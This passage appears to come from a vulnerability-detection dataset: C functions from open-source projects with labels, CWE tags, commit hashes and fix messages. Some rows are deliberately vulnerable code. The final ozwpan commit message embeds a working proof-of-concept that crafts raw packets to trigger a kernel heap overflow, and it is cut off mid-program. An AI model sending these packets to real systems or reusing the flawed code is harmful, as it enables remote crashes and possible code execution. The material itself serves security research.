struct ares_naptr_reply *naptr_last = NULL;
struct ares_naptr_reply *naptr_curr;
/* Set *naptr_out to NULL for all failure cases. */
*naptr_out = NULL;
/* Give up if abuf doesn't have room for a header. */
if (alen < HFIXEDSZ)
return ARES_EBADRESP;
/* Fetch the question and answer count from the header. */
qdcount = DNS_HEADER_QDCOUNT (abuf);
ancount = DNS_HEADER_ANCOUNT (abuf);
if (qdcount != 1)
return ARES_EBADRESP;
if (ancount == 0)
return ARES_ENODATA;
/* Expand the name from the question, and skip past the question. */
aptr = abuf + HFIXEDSZ;
status = ares_expand_name (aptr, abuf, alen, &hostname, &len);
if (status != ARES_SUCCESS)
return status;
if (aptr + len + QFIXEDSZ > abuf + alen)
{
ares_free (hostname);
return ARES_EBADRESP;
}
aptr += len + QFIXEDSZ;
/* Examine each answer resource record (RR) in turn. */
for (i = 0; i < ancount; i++)
{
/* Decode the RR up to the data field. */
status = ares_expand_name (aptr, abuf, alen, &rr_name, &len);
if (status != ARES_SUCCESS)
{
break;
}
aptr += len;
if (aptr + RRFIXEDSZ > abuf + alen)
{
status = ARES_EBADRESP;
break;
}
rr_type = DNS_RR_TYPE (aptr);
rr_class = DNS_RR_CLASS (aptr);
rr_len = DNS_RR_LEN (aptr);
aptr += RRFIXEDSZ;
if (aptr + rr_len > abuf + alen)
{
status = ARES_EBADRESP;
break;
}
/* RR must contain at least 7 bytes = 2 x int16 + 3 x name */
if (rr_len < 7)
{
status = ARES_EBADRESP;
break;
}
/* Check if we are really looking at a NAPTR record */
if (rr_class == C_IN && rr_type == T_NAPTR)
{
/* parse the NAPTR record itself */
/* Allocate storage for this NAPTR answer appending it to the list */
naptr_curr = ares_malloc_data(ARES_DATATYPE_NAPTR_REPLY);
if (!naptr_curr)
{
status = ARES_ENOMEM;
break;
}
if (naptr_last)
{
naptr_last->next = naptr_curr;
}
else
{
naptr_head = naptr_curr;
}
naptr_last = naptr_curr;
vptr = aptr;
naptr_curr->order = DNS__16BIT(vptr);
vptr += sizeof(unsigned short);
naptr_curr->preference = DNS__16BIT(vptr);
vptr += sizeof(unsigned short);
status = ares_expand_string(vptr, abuf, alen, &naptr_curr->flags, &len);
if (status != ARES_SUCCESS)
break;
vptr += len;
status = ares_expand_string(vptr, abuf, alen, &naptr_curr->service, &len);
if (status != ARES_SUCCESS)
break;
vptr += len;
status = ares_expand_string(vptr, abuf, alen, &naptr_curr->regexp, &len);
if (status != ARES_SUCCESS)
break;
vptr += len;
status = ares_expand_name(vptr, abuf, alen, &naptr_curr->replacement, &len);
if (status != ARES_SUCCESS)
break;
}
/* Don't lose memory in the next iteration */
ares_free (rr_name);
rr_name = NULL;
/* Move on to the next record */
aptr += rr_len;
}
if (hostname)
ares_free (hostname);
if (rr_name)
ares_free (rr_name);
/* clean up on error */
if (status != ARES_SUCCESS)
{
if (naptr_head)
ares_free_data (naptr_head);
return status;
}
/* everything looks fine, return the data */
*naptr_out = naptr_head;
return ARES_SUCCESS;
}
| 1 |
[
"CWE-200"
] |
c-ares
|
18ea99693d63f957ecb670045adbd2c1da8a4641
| 92,817,310,620,354,770,000,000,000,000,000,000,000 | 145 |
ares_parse_naptr_reply: make buffer length check more accurate
9478908a490a6bf009ba58d81de8c1d06d50a117 introduced a length check
for records parsed by `ares_parse_naptr_reply()`. However, that
function is designed to parse replies which also contain non-NAPTR
records; for A records, the `rr_len > 7` check will fail as there
are only 4 bytes of payload.
In particular, parsing ANY replies for NAPTR records was broken
by that patch.
Fix that by moving the check into the case in which it is already
known that the record is a NAPTR record.
|
TEST_F(HttpConnectionManagerConfigTest, DEPRECATED_FEATURE_TEST(DeprecatedExtensionFilterName)) {
const std::string deprecated_name = "envoy.http_connection_manager";
ASSERT_NE(
nullptr,
Registry::FactoryRegistry<Server::Configuration::NamedNetworkFilterConfigFactory>::getFactory(
deprecated_name));
}
| 0 |
[
"CWE-22"
] |
envoy
|
5333b928d8bcffa26ab19bf018369a835f697585
| 3,097,148,148,299,997,000,000,000,000,000,000,000 | 8 |
Implement handling of escaped slash characters in URL path
Fixes: CVE-2021-29492
Signed-off-by: Yan Avlasov <[email protected]>
|
int managesieve_parser_read_args
(struct managesieve_parser *parser, unsigned int count,
enum managesieve_parser_flags flags, const struct managesieve_arg **args_r)
{
parser->flags = flags;
while ( !parser->eol && (count == 0 || IS_UNFINISHED(parser)
|| array_count(&parser->root_list) < count) ) {
if ( !managesieve_parser_read_arg(parser) )
break;
if ( parser->line_size > parser->max_line_size ) {
parser->error = "MANAGESIEVE command line too large";
break;
}
}
if ( parser->error != NULL ) {
/* error, abort */
parser->line_size += parser->cur_pos;
i_stream_skip(parser->input, parser->cur_pos);
parser->cur_pos = 0;
*args_r = NULL;
return -1;
} else if ( (!IS_UNFINISHED(parser) && count > 0
&& array_count(&parser->root_list) >= count) || parser->eol ) {
/* all arguments read / end of line. */
return finish_line(parser, count, args_r);
} else {
/* need more data */
*args_r = NULL;
return -2;
}
}
| 0 |
[
"CWE-787"
] |
pigeonhole
|
7ce9990a5e6ba59e89b7fe1c07f574279aed922c
| 61,305,857,850,872,970,000,000,000,000,000,000,000 | 34 |
lib-managesieve: Don't accept strings with NULs
ManageSieve doesn't allow NULs in strings.
This fixes a bug with unescaping a string with NULs: str_unescape() could
have been called for memory that points outside the allocated string,
causing heap corruption. This could cause crashes or theoretically even
result in remote code execution exploit.
Found by Nick Roessler and Rafi Rubin
|
int blkid_partitions_strcpy_ptuuid(blkid_probe pr, char *str)
{
struct blkid_chain *chn = blkid_probe_get_chain(pr);
if (chn->binary || !str || !*str)
return 0;
if (!blkid_probe_set_value(pr, "PTUUID", (unsigned char *) str, strlen(str) + 1))
return -ENOMEM;
return 0;
}
| 0 |
[] |
util-linux
|
50d1594c2e6142a3b51d2143c74027480df082e0
| 282,200,330,723,627,080,000,000,000,000,000,000,000 | 12 |
libblkid: avoid non-empty recursion in EBR
This is extension to the patch 7164a1c34d18831ac61c6744ad14ce916d389b3f.
We also need to detect non-empty recursion in the EBR chain. It's
possible to create standard valid logical partitions and in the last one
points back to the EBR chain. In this case all offsets will be non-empty.
Unfortunately, it's valid to create logical partitions that are not in
the "disk order" (sorted by start offset). So link somewhere back is
valid, but this link cannot points to already existing partition
(otherwise we will see recursion).
This patch forces libblkid to ignore duplicate logical partitions, the
duplicate chain segment is interpreted as non-data segment, after 100
iterations with non-data segments it will break the loop -- no memory
is allocated in this case by the loop.
Addresses: https://bugzilla.redhat.com/show_bug.cgi?id=1349536
References: http://seclists.org/oss-sec/2016/q3/40
Signed-off-by: Karel Zak <[email protected]>
|
static word32 IndefItems_Len(IndefItems* items)
{
return items->len[items->idx].len;
}
| 0 |
[
"CWE-125",
"CWE-345"
] |
wolfssl
|
f93083be72a3b3d956b52a7ec13f307a27b6e093
| 151,297,463,294,470,220,000,000,000,000,000,000,000 | 4 |
OCSP: improve handling of OCSP no check extension
|
SCTP_STATIC int __sctp_setsockopt_connectx(struct sock* sk,
struct sockaddr __user *addrs,
int addrs_size,
sctp_assoc_t *assoc_id)
{
int err = 0;
struct sockaddr *kaddrs;
SCTP_DEBUG_PRINTK("%s - sk %p addrs %p addrs_size %d\n",
__func__, sk, addrs, addrs_size);
if (unlikely(addrs_size <= 0))
return -EINVAL;
/* Check the user passed a healthy pointer. */
if (unlikely(!access_ok(VERIFY_READ, addrs, addrs_size)))
return -EFAULT;
/* Alloc space for the address array in kernel memory. */
kaddrs = kmalloc(addrs_size, GFP_KERNEL);
if (unlikely(!kaddrs))
return -ENOMEM;
if (__copy_from_user(kaddrs, addrs, addrs_size)) {
err = -EFAULT;
} else {
err = __sctp_connect(sk, kaddrs, addrs_size, assoc_id);
}
kfree(kaddrs);
return err;
}
| 0 |
[] |
linux-2.6
|
5e739d1752aca4e8f3e794d431503bfca3162df4
| 160,019,204,449,067,600,000,000,000,000,000,000,000 | 33 |
sctp: fix potential panics in the SCTP-AUTH API.
All of the SCTP-AUTH socket options could cause a panic
if the extension is disabled and the API is envoked.
Additionally, there were some additional assumptions that
certain pointers would always be valid which may not
always be the case.
This patch hardens the API and address all of the crash
scenarios.
Signed-off-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static int has_sha1_pack_kept_or_nonlocal(const unsigned char *sha1)
{
static struct packed_git *last_found = (void *)1;
struct packed_git *p;
p = (last_found != (void *)1) ? last_found : packed_git;
while (p) {
if ((!p->pack_local || p->pack_keep) &&
find_pack_entry_one(sha1, p)) {
last_found = p;
return 1;
}
if (p == last_found)
p = packed_git;
else
p = p->next;
if (p == last_found)
p = p->next;
}
return 0;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
git
|
de1e67d0703894cb6ea782e36abb63976ab07e60
| 8,587,352,776,023,511,000,000,000,000,000,000,000 | 22 |
list-objects: pass full pathname to callbacks
When we find a blob at "a/b/c", we currently pass this to
our show_object_fn callbacks as two components: "a/b/" and
"c". Callbacks which want the full value then call
path_name(), which concatenates the two. But this is an
inefficient interface; the path is a strbuf, and we could
simply append "c" to it temporarily, then roll back the
length, without creating a new copy.
So we could improve this by teaching the callsites of
path_name() this trick (and there are only 3). But we can
also notice that no callback actually cares about the
broken-down representation, and simply pass each callback
the full path "a/b/c" as a string. The callback code becomes
even simpler, then, as we do not have to worry about freeing
an allocated buffer, nor rolling back our modification to
the strbuf.
This is theoretically less efficient, as some callbacks
would not bother to format the final path component. But in
practice this is not measurable. Since we use the same
strbuf over and over, our work to grow it is amortized, and
we really only pay to memcpy a few bytes.
Signed-off-by: Jeff King <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
free_imported(cctx_T *cctx)
{
int idx;
for (idx = 0; idx < cctx->ctx_imports.ga_len; ++idx)
{
imported_T *import = ((imported_T *)cctx->ctx_imports.ga_data) + idx;
vim_free(import->imp_name);
}
ga_clear(&cctx->ctx_imports);
}
| 0 |
[
"CWE-416"
] |
vim
|
9c23f9bb5fe435b28245ba8ac65aa0ca6b902c04
| 277,474,446,676,106,800,000,000,000,000,000,000,000 | 12 |
patch 8.2.3902: Vim9: double free with nested :def function
Problem: Vim9: double free with nested :def function.
Solution: Pass "line_to_free" from compile_def_function() and make sure
cmdlinep is valid.
|
void MainWindow::on_actionOpenOther_triggered()
{
// these static are used to open dialog with previous configuration
OpenOtherDialog dialog(this);
if (MLT.producer())
dialog.load(MLT.producer());
if (dialog.exec() == QDialog::Accepted) {
closeProducer();
open(dialog.newProducer(MLT.profile()));
}
}
| 0 |
[
"CWE-89",
"CWE-327",
"CWE-295"
] |
shotcut
|
f008adc039642307f6ee3378d378cdb842e52c1d
| 156,012,633,933,872,040,000,000,000,000,000,000,000 | 12 |
fix upgrade check is not using TLS correctly
|
static void run_again(struct ieee80211_sub_if_data *sdata,
unsigned long timeout)
{
sdata_assert_lock(sdata);
if (!timer_pending(&sdata->u.mgd.timer) ||
time_before(timeout, sdata->u.mgd.timer.expires))
mod_timer(&sdata->u.mgd.timer, timeout);
}
| 0 |
[] |
linux
|
79c92ca42b5a3e0ea172ea2ce8df8e125af237da
| 189,082,136,417,175,660,000,000,000,000,000,000,000 | 9 |
mac80211: handle deauthentication/disassociation from TDLS peer
When receiving a deauthentication/disassociation frame from a TDLS
peer, a station should not disconnect the current AP, but only
disable the current TDLS link if it's enabled.
Without this change, a TDLS issue can be reproduced by following the
steps as below:
1. STA-1 and STA-2 are connected to AP, bidirection traffic is running
between STA-1 and STA-2.
2. Set up TDLS link between STA-1 and STA-2, stay for a while, then
teardown TDLS link.
3. Repeat step #2 and monitor the connection between STA and AP.
During the test, one STA may send a deauthentication/disassociation
frame to another, after TDLS teardown, with reason code 6/7, which
means: Class 2/3 frame received from nonassociated STA.
On receive this frame, the receiver STA will disconnect the current
AP and then reconnect. It's not a expected behavior, purpose of this
frame should be disabling the TDLS link, not the link with AP.
Cc: [email protected]
Signed-off-by: Yu Wang <[email protected]>
Signed-off-by: Johannes Berg <[email protected]>
|
Optimized(const boost::intrusive_ptr<ExpressionContext>& expCtx,
const ValueSet& cachedRhsSet,
const ExpressionVector& operands)
: ExpressionSetIsSubset(expCtx), _cachedRhsSet(cachedRhsSet) {
_children = operands;
}
| 0 |
[
"CWE-190"
] |
mongo
|
21d8699ed6c517b45e1613e20231cd8eba894985
| 176,722,287,246,534,020,000,000,000,000,000,000,000 | 6 |
SERVER-43699 $mod should not overflow for large negative values
|
static void remove_hugetlb_page_for_demote(struct hstate *h, struct page *page,
bool adjust_surplus)
{
__remove_hugetlb_page(h, page, adjust_surplus, true);
}
| 0 |
[] |
linux
|
a4a118f2eead1d6c49e00765de89878288d4b890
| 330,930,930,551,887,640,000,000,000,000,000,000,000 | 5 |
hugetlbfs: flush TLBs correctly after huge_pmd_unshare
When __unmap_hugepage_range() calls to huge_pmd_unshare() succeed, a TLB
flush is missing. This TLB flush must be performed before releasing the
i_mmap_rwsem, in order to prevent an unshared PMDs page from being
released and reused before the TLB flush took place.
Arguably, a comprehensive solution would use mmu_gather interface to
batch the TLB flushes and the PMDs page release, however it is not an
easy solution: (1) try_to_unmap_one() and try_to_migrate_one() also call
huge_pmd_unshare() and they cannot use the mmu_gather interface; and (2)
deferring the release of the page reference for the PMDs page until
after i_mmap_rwsem is dropeed can confuse huge_pmd_unshare() into
thinking PMDs are shared when they are not.
Fix __unmap_hugepage_range() by adding the missing TLB flush, and
forcing a flush when unshare is successful.
Fixes: 24669e58477e ("hugetlb: use mmu_gather instead of a temporary linked list for accumulating pages)" # 3.6
Signed-off-by: Nadav Amit <[email protected]>
Reviewed-by: Mike Kravetz <[email protected]>
Cc: Aneesh Kumar K.V <[email protected]>
Cc: KAMEZAWA Hiroyuki <[email protected]>
Cc: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
ecma_snapshot_get_literal (const uint8_t *literal_base_p, /**< literal start */
ecma_value_t literal_value) /**< string / number offset */
{
JERRY_ASSERT ((literal_value & ECMA_VALUE_TYPE_MASK) == ECMA_TYPE_SNAPSHOT_OFFSET);
const uint8_t *literal_p = literal_base_p + (literal_value >> JERRY_SNAPSHOT_LITERAL_SHIFT);
if (literal_value & JERRY_SNAPSHOT_LITERAL_IS_NUMBER)
{
ecma_number_t num;
memcpy (&num, literal_p, sizeof (ecma_number_t));
return ecma_find_or_create_literal_number (num);
}
#if JERRY_BUILTIN_BIGINT
if (literal_value & JERRY_SNAPSHOT_LITERAL_IS_BIGINT)
{
uint32_t bigint_sign_and_size = *(uint32_t *) literal_p;
uint32_t size = bigint_sign_and_size & ~(uint32_t) (sizeof (ecma_bigint_digit_t) - 1);
ecma_extended_primitive_t *bigint_p = ecma_bigint_create (size);
if (bigint_p == NULL)
{
jerry_fatal (ERR_OUT_OF_MEMORY);
}
/* Only the sign bit can differ. */
JERRY_ASSERT (bigint_p->u.bigint_sign_and_size == (bigint_sign_and_size & ~(uint32_t) ECMA_BIGINT_SIGN));
bigint_p->u.bigint_sign_and_size = bigint_sign_and_size;
memcpy (ECMA_BIGINT_GET_DIGITS (bigint_p, 0), literal_p + sizeof (uint32_t), size);
return ecma_find_or_create_literal_bigint (ecma_make_extended_primitive_value (bigint_p, ECMA_TYPE_BIGINT));
}
#endif /* JERRY_BUILTIN_BIGINT */
uint16_t length = *(const uint16_t *) literal_p;
return ecma_find_or_create_literal_string (literal_p + sizeof (uint16_t), length);
} /* ecma_snapshot_get_literal */
| 1 |
[
"CWE-416"
] |
jerryscript
|
3bcd48f72d4af01d1304b754ef19fe1a02c96049
| 223,753,260,190,128,900,000,000,000,000,000,000,000 | 40 |
Improve parse_identifier (#4691)
Ascii string length is no longer computed during string allocation.
JerryScript-DCO-1.0-Signed-off-by: Daniel Batiz [email protected]
|
static void nhmldump_send_frame(GF_NHMLDumpCtx *ctx, char *data, u32 data_size, GF_FilterPacket *pck)
{
GF_FilterPacket *dst_pck;
char nhml[1024];
const GF_PropertyValue *p;
u32 size;
u8 *output;
GF_FilterSAPType sap = gf_filter_pck_get_sap(pck);
u64 dts = gf_filter_pck_get_dts(pck);
u64 cts = gf_filter_pck_get_cts(pck);
if (dts==GF_FILTER_NO_TS) dts = cts;
if (cts==GF_FILTER_NO_TS) cts = dts;
ctx->pck_num++;
sprintf(nhml, "<NHNTSample number=\"%d\" DTS=\""LLU"\" dataLength=\"%d\" ", ctx->pck_num, dts, data_size);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
if (ctx->pckp || (cts != dts) ) {
sprintf(nhml, "CTSOffset=\"%d\" ", (s32) ((s64)cts - (s64)dts));
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
if (sap==GF_FILTER_SAP_1) {
sprintf(nhml, "isRAP=\"yes\" ");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else if (sap) {
sprintf(nhml, "SAPType=\"%d\" ", sap);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else if (ctx->pckp) {
sprintf(nhml, "isRAP=\"no\" ");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
if ((sap==GF_FILTER_SAP_4) || (sap==GF_FILTER_SAP_4_PROL)) {
s32 roll = gf_filter_pck_get_roll_info(pck);
sprintf(nhml, "SAPType=\"4\" %s=\"%d\" ", (sap==GF_FILTER_SAP_4_PROL) ? "prol" : "roll", roll);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
}
if (ctx->pckp) {
u64 bo;
u32 duration, idx;
sprintf(nhml, "mediaOffset=\""LLU"\" ", ctx->mdia_pos);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
bo = gf_filter_pck_get_byte_offset(pck);
if (bo!=GF_FILTER_NO_BO) {
sprintf(nhml, "sourceByteOffset=\""LLU"\" ", bo);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
duration = gf_filter_pck_get_duration(pck);
if (duration) {
sprintf(nhml, "duration=\"%d\" ", duration);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
idx = gf_filter_pck_get_carousel_version(pck);
if (idx) {
sprintf(nhml, "carouselVersion=\"%d\" ", idx);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
idx = 0;
while (1) {
u32 prop_4cc;
const char *prop_name;
p = gf_filter_pck_enum_properties(pck, &idx, &prop_4cc, &prop_name);
if (!p) break;
if (prop_4cc == GF_PROP_PCK_SUBS) continue;
nhmldump_pck_property(ctx, prop_4cc, prop_name, p);
}
}
if (ctx->chksum) {
if (ctx->chksum==1) {
u32 crc = gf_crc_32(data, data_size);
sprintf(nhml, "crc=\"%08X\" ", crc);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else {
u32 j;
u8 hash[GF_SHA1_DIGEST_SIZE];
gf_sha1_csum(data, data_size, hash);
sprintf(nhml, "sha1=\"");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
for (j=0; j<20; j++) {
sprintf(nhml, "%02X", hash[j]);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
sprintf(nhml, "\" ");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
}
sprintf(nhml, ">\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
p = gf_filter_pck_get_property(pck, GF_PROP_PCK_SUBS);
if (p) {
u32 offset_in_sample = 0;
Bool first_subs = GF_TRUE;
if (!ctx->bs_r) ctx->bs_r = gf_bs_new(p->value.data.ptr, p->value.data.size, GF_BITSTREAM_READ);
else gf_bs_reassign_buffer(ctx->bs_r, p->value.data.ptr, p->value.data.size);
//(data) binary blob containing N [(u32)flags(u32)size(u32)reserved(u8)priority(u8) discardable]
while (gf_bs_available(ctx->bs_r)) {
u32 s_flags = gf_bs_read_u32(ctx->bs_r);
u32 s_size = gf_bs_read_u32(ctx->bs_r);
u32 s_res = gf_bs_read_u32(ctx->bs_r);
u8 s_prio = gf_bs_read_u8(ctx->bs_r);
u8 s_discard = gf_bs_read_u8(ctx->bs_r);
if (offset_in_sample + s_size > data_size) {
GF_LOG(GF_LOG_ERROR, GF_LOG_MEDIA, ("Wrong subsample info: sample size %d vs subsample offset+size %dn", data_size, offset_in_sample + s_size));
break;
}
if (ctx->is_stpp && ctx->nhmlonly) {
if (first_subs) {
sprintf(nhml, "<NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, data, s_size);
sprintf(nhml, "</NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else {
u32 d_size;
if (ctx->b64_buffer_size < 2*s_size + 3) {
ctx->b64_buffer_size = 2 * s_size + 3;
ctx->b64_buffer = gf_realloc(ctx->b64_buffer, ctx->b64_buffer_size);
}
d_size = gf_base64_encode(data + offset_in_sample, s_size, ctx->b64_buffer, ctx->b64_buffer_size);
ctx->b64_buffer[d_size] = 0;
sprintf(nhml, "<NHNTSubSample data=\"data:application/octet-string;base64,");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, ctx->b64_buffer, d_size);
sprintf(nhml, "\">\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
} else {
sprintf(nhml, "<NHNTSubSample size=\"%d\" flags=\"%d\" reserved=\"%d\" priority=\"%d\" discard=\"%d\" />\n", s_size, s_flags, s_res, s_prio, s_discard);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
first_subs = GF_FALSE;
}
} else if (ctx->is_stpp && ctx->nhmlonly) {
sprintf(nhml, "<NHNTSubSample><![CDATA[\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, data, data_size);
sprintf(nhml, "]]></NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
sprintf(nhml, "</NHNTSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_get_content_no_truncate(ctx->bs_w, &ctx->nhml_buffer, &size, &ctx->nhml_buffer_size);
if (ctx->filep) {
gf_fwrite(ctx->nhml_buffer, size, ctx->filep);
return;
}
dst_pck = gf_filter_pck_new_alloc(ctx->opid_nhml, size, &output);
if (dst_pck) {
memcpy(output, ctx->nhml_buffer, size);
gf_filter_pck_set_framing(dst_pck, GF_FALSE, GF_FALSE);
gf_filter_pck_send(dst_pck);
}
ctx->mdia_pos += data_size;
if (ctx->opid_mdia) {
//send the complete data packet
dst_pck = gf_filter_pck_new_ref(ctx->opid_mdia, 0, data_size, pck);
if (!dst_pck) return;
gf_filter_pck_merge_properties(pck, dst_pck);
//keep byte offset ?
// gf_filter_pck_set_byte_offset(dst_pck, GF_FILTER_NO_BO);
gf_filter_pck_set_framing(dst_pck, ctx->first, GF_FALSE);
gf_filter_pck_send(dst_pck);
}
}
| 0 |
[
"CWE-787"
] |
gpac
|
ea1eca00fd92fa17f0e25ac25652622924a9a6a0
| 308,370,927,874,366,350,000,000,000,000,000,000,000 | 181 |
fixed #2138
|
compute_U_value_R3(std::string const& user_password,
QPDF::EncryptionData const& data)
{
// Algorithm 3.5 from the PDF 1.7 Reference Manual
std::string k1 = QPDF::compute_encryption_key(user_password, data);
MD5 md5;
md5.encodeDataIncrementally(
pad_or_truncate_password_V4("").c_str(), key_bytes);
md5.encodeDataIncrementally(data.getId1().c_str(),
data.getId1().length());
MD5::Digest digest;
md5.digest(digest);
pad_short_parameter(k1, data.getLengthBytes());
iterate_rc4(digest, sizeof(MD5::Digest),
QUtil::unsigned_char_pointer(k1),
data.getLengthBytes(), 20, false);
char result[key_bytes];
memcpy(result, digest, sizeof(MD5::Digest));
// pad with arbitrary data -- make it consistent for the sake of
// testing
for (unsigned int i = sizeof(MD5::Digest); i < key_bytes; ++i)
{
result[i] = static_cast<char>((i * i) % 0xff);
}
return std::string(result, key_bytes);
}
| 1 |
[
"CWE-787"
] |
qpdf
|
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
| 159,706,500,661,063,770,000,000,000,000,000,000,000 | 27 |
Fix sign and conversion warnings (major)
This makes all integer type conversions that have potential data loss
explicit with calls that do range checks and raise an exception. After
this commit, qpdf builds with no warnings when -Wsign-conversion
-Wconversion is used with gcc or clang or when -W3 -Wd4800 is used
with MSVC. This significantly reduces the likelihood of potential
crashes from bogus integer values.
There are some parts of the code that take int when they should take
size_t or an offset. Such places would make qpdf not support files
with more than 2^31 of something that usually wouldn't be so large. In
the event that such a file shows up and is valid, at least qpdf would
raise an error in the right spot so the issue could be legitimately
addressed rather than failing in some weird way because of a silent
overflow condition.
|
static void oz_hcd_stop(struct usb_hcd *hcd)
{
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
| 179,744,483,976,964,360,000,000,000,000,000,000,000 | 3 |
ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
